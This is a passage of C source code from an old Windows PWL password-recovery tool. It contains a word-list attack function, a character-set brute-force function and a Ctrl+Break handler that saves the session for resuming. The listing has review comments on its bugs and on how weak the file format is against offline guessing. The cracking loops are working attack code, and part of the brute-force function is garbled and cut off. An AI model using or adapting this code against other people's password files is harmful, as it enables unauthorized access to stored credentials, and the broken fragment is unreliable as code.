fprintf(f,"!%s\r\n%s\r\n%s\r\n",rip_name,rip_user,rip_password);
fclose(f);
if (ferror(f)) error(2,"Session RIP creation failure");
else fprintf(stderr,"Session RIP file created successfully!\n");
}; return 0;
}; last_raise=clock();
fprintf(stderr,
"\nCurrently interested moments %u, %s.\n",pwd_ok,
(pwd_ok==0)?"nothing to see":"look at them after all");
if (hdl_type)
fprintf(stderr,
"Currently trained %lu passwords, Vocabulary position %lu,\n",
pwd_cnt,rip_pos);
else
fprintf(stderr,
"Currently trained %lu passwords, Last trained password is '%s',\n",
pwd_cnt,rip_password);
fprintf(stderr,"Hit the Ctrl+Break again within 1 second to exit!!!\n");
return 1;
}
/*=================================================================*/
/* Run a word-list session against one PWL file.
 *
 * pwd_file       PWL file, loaded through read_pwl_file()
 * pwd_name       user name that is mixed into the key derivation
 * voc_file       text file with one candidate per line
 * start_voc_pos  byte offset in voc_file at which reading starts
 *
 * For each line the saved encrypted check pack is restored, decrypted
 * with the table derived from the candidate, and tested with
 * check_cryption_sign(). Only the 16-byte signature is tested, which
 * is why hits are printed as "maybe correct".
 *
 * The counters and rip_* names assigned here are file-scope variables
 * whose declarations are not in the visible part of this listing;
 * they are also read by enum_hdl(), the Ctrl+Break handler installed
 * with ctrlbrk().
 *
 * NOTE(review):
 *   - the result of fgets() is not checked; when it returns NULL at
 *     end of file, s still holds the previous line and that line is
 *     processed a second time before feof() stops the loop;
 *   - lines longer than sizeof(s)-1 are split into several candidates;
 *   - the result of fseek() is not checked;
 *   - f is declared but not used in this function.
 *
 * Defensive reading: each attempt needs only the file and two hash
 * passes, so nothing in this format slows down offline guessing. */
void voc_pwl_file(char* pwd_file, char* pwd_name,
char* voc_file, dword start_voc_pos) {
FILE *v,*f; PwlFile b; xor_table x;
check_pack c; char s[256]; int r;
if ((v=fopen(voc_file,"r"))==NULL) error(2,"Can't open vocabulary file");
fseek(v,start_voc_pos,SEEK_SET); read_pwl_file(pwd_file,&b);
/* keep the still-encrypted check pack so it can be restored per try */
memcpy(&c,&b.File.Hdr.Check,sizeof(c));
/* publish session state for the break handler */
rip_name=pwd_file; rip_user=pwd_name; rip_voc=voc_file;
start_time=clock(); last_raise=0; pwd_cnt=0;
rip_pos=start_voc_pos; pwd_fault=1; pwd_ok=0;
hdl_type=1; ctrlbrk(&enum_hdl);
/*---- first test the empty password -------------------------------*/
make_cryption_table(&x,pwd_name,"",-1,b.File.Hdr.CryptoSeed[0x10]);
use_xor_table(&x,&b.File.Hdr.Check,sizeof(b.File.Hdr.Check));
r=check_cryption_sign(pwd_name,b.File.Hdr.Check.CryptoSign,
b.File.Hdr.Check.CheckSign);
if (!r) {printf("Maybe - think about this.\n\n"); pwd_ok++;};
printf("Beginning vocabulary session for file '%s',\n",pwd_file);
printf("of user '%s' via vocabulary '%s'.\n",pwd_name,voc_file);
/*---- then one attempt per line of the word list ------------------*/
while (!feof(v)) {
fgets(s,sizeof(s),v); if (ferror(v))
error(2,"I/O failure during vocabulary enumerating");
/* candidates are upper-cased and cut at the line feed */
LnTrim(UpStr(s)); rip_pos=ftell(v); pwd_cnt++;
memcpy(&b.File.Hdr.Check,&c,sizeof(c)); /* restore encrypted check pack */
make_cryption_table(&x,pwd_name,s,-1,b.File.Hdr.CryptoSeed[0x10]);
use_xor_table(&x,&b.File.Hdr.Check,sizeof(b.File.Hdr.Check));
r=check_cryption_sign(pwd_name,b.File.Hdr.Check.CryptoSign,
b.File.Hdr.Check.CheckSign);
if (!r) {printf("Password '%s' - maybe correct!\n",s); pwd_ok++;};
}; fclose(v); pwd_fault=0; enum_hdl(); /* pwd_fault=0: finished normally; the handler is called directly */
}
/*=================================================================*/
void try_pwl_file(char* pwd_file, char* pwd_name, char* pwd_seed) {
char pwd[256], enum_str[256]; byte mask[256]; check_pack c;
FILE* f; PwlFile b; xor_table x; int r,upper,i,l;
if ((f=fopen(InitializeFile,"r"))==NULL) {
if ((f=fopen(InitializeFile,"w"))==NULL)
error(2,"Unable to create initialization file");
fprintf(f,"%s%s%s\n","0123456789",
"ABCDEFGHIJKLMNOPQRSTUVWXYZ",
"");
fclose(f);
error(0,"Created default initialization file, inspect and run again");
} else {
fgets(enum_str,sizeof(enum_str),f); /* read the initialization file */
LnTrim(UpStr(enum_str)); upper=strlen(enum_str)-1; fclose(f);
if (upper<=0) error(1,"No enumeration string, nothing to do");
}; strcpy(pwd,pwd_seed);
for(i=0;i>.\n",pwd_name,enum_str);
l=strlen(pwd); do { printf("Using password length %d characters.\n",l);
do { asm mov ah,30h; asm int 21h; /* Yield. For break detection. */
memcpy(&b.File.Hdr.Check,&c,sizeof(c)); pwd_cnt++;
make_cryption_table(&x,pwd_name,pwd,-1,b.File.Hdr.CryptoSeed[0x10]);
use_xor_table(&x,&b.File.Hdr.Check,sizeof(b.File.Hdr.Check));
r=check_cryption_sign(pwd_name,b.File.Hdr.Check.CryptoSign,
b.File.Hdr.Check.CheckSign);
if (!r) {printf("Password '%s' - maybe correct!\n",pwd); pwd_ok++;};
i=0; while (mask[i]==upper && i